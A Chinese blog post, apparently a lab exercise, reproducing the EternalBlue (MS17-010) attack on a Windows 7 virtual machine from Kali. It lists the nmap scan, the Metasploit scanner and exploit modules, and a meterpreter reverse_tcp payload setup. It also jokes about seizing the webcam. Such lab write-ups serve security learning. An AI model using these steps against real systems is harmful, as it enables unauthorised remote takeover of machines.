永恒之蓝漏洞复现

最新推荐文章于 2022-11-27 21:45:21 发布
最新推荐文章于 2022-11-27 21:45:21 发布
阅读量324 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 永恒之蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44897902/article/details/101227360
版权

参考:

https://blog.youkuaiyun.com/n5xxxx__zy/article/details/90705057

目标ip:192.168.91.149
攻击机:192.168.91.146

目标系统:win7
攻击机:kail
准备工作:
目标机:win7开启网络共享:控制面板-网络和共享中心-更改高级共享设置-启用网络发现-关闭密码保护共享-保存修改
攻击机:开启postgresql

开启postgresql:
先查看当前postgresql状态:
service postgresql status
将其开启:

service postgresql start

在这里插入图片描述

使用nmap扫描一下收集信息

nmap -sS 192.168.91.149

发现445端口开启(445端口就是网络共享端口),可以进行下一步
在这里插入图片描述

打开msf,先搜索一下漏洞模块:
在这里插入图片描述

search ms17-010

然后使用辅助模块:

use auxiliary/scanner/smb/smb_ms17_010

设置payload:set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
在这里插入图片描述

    show options 

    set RHOST 目标主机地址 

    set LHOST 攻击机地址 

	set LPORT

回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
在这里插入图片描述
在这里插入图片描述
run:开始攻击(使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

我这个win7太菜了,还没等我进一步探索,弄点摄像头什么的,它就崩了,不管怎么说,复现完毕
在这里插入图片描述

基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4332
ms17-010,永恒之蓝漏洞复现
永恒之蓝漏洞
最新发布
2401_85624649的博客
04-07 147
输入shell 进行windows命令界面 输出chcp 65001 修改编码 解决乱码问题。输入use auxiliary/scanner/smb/smb_ms17_010加载扫描模块。输入set rhosts 10.225..91.16 配置目标主机。在目标电脑中创建 ckw 用户 密码为:admin.123456。输入search ms17-010 搜索利用该漏洞的 脚本工具。然后运行扫描发现有ms17-010漏洞。输入msfconsole进入msf。使用永恒之蓝攻击模块:use。
永恒之蓝--漏洞复现.
qq_44640313的博客
11-27 155
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞复现永恒之蓝漏洞
命运的旋律的博客
12-05 482
永恒之蓝漏洞复现 使用msfconsole来对ms17-010来进行扫描和利用 靶机:win7-x64 测试机:kali 扫描ms17-010漏洞 在kali中启动使用msfconsole启动msfconsole 使用search ms17-010搜索关于ms17-010的模块 先调用搜索到的模块,再查看搜索模块的配置选项 需要设置IP地址,确认设置信息都没用遗漏后,运行扫描 发现漏洞。可以使用...
永恒之蓝(ms17-010)漏洞复现
qq_45070118的博客
09-04 1168
永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用...
永恒之蓝复现
Seizerz的博客
09-09 512
一、漏洞介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密...
永恒之蓝漏洞复现(ms17-010)
热门推荐
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
MS17-010“永恒之蓝漏洞复现
longanquan的博客
08-18 416
本来不想写这篇博客的,这个漏洞现在几乎不存在了,只有个别用户实在是不懂安全,至今还在用存在这个漏洞windows7系统,也没有下载补丁,Windows7系统现在也不更新了,但是也不排除还有一部分忠实粉丝喜欢Windows7这个系统。还有一个原因是因为我上一篇写了“永恒之黑”,对于我这个“强迫症”的人来说,一家人就应该整整齐齐的。简单写写大家看个热闹就行。 “永恒之蓝”是2017年报出来的Windows系统SMB服务的漏洞,影响的系统有Windows7、Windows server 2008。主要是Wind
我眼中的永恒之蓝漏洞复现
ovowovo的博客
11-29 354
靶机:Windows 2003 ip 192.168.0.167 攻击机:kali ip 192.168.0.159 1.两台机子需要互相ping通 在这里插入图片描述 在这里插入图片描述 2.启动msfconsole,每次出现的图都不同不必在意,直接输msfconsole命令即可出现下图msf>即为开启 在这里插入图片描述 3.搜索漏洞,命令 search ms17_010 在这里插图片...
matplotlib与numpy的版本对应关系
05-29
不同版本的matplotlib与numpy之间可能存在一些兼容性问题,因此在使用时需要注意它们之间的版本对应关系。一般而言,可以按照以下对应关系来选择版本: - matplotlib 2.0.x 对应的numpy版本为1.7.x到1.13.x; - matplotlib 2.1.x 对应的numpy版本为1.7.x到1.13.x; - matplotlib 2.2.x 对应的numpy版本为1.7.x到1.14.x; - matplotlib 3.0.x 对应的numpy版本为1.11.x到1.15.x; - matplotlib 3.1.x 对应的numpy版本为1.11.x到1.17.x; - matplotlib 3.2.x 对应的numpy版本为1.11.x到1.18.x。 需要注意的是,这些版本对应关系并不是绝对的,具体的兼容性还要根据具体的应用场景和使用方式来判断。建议在使用时先查看matplotlib和numpy的官方文档,了解它们的兼容性和版本要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值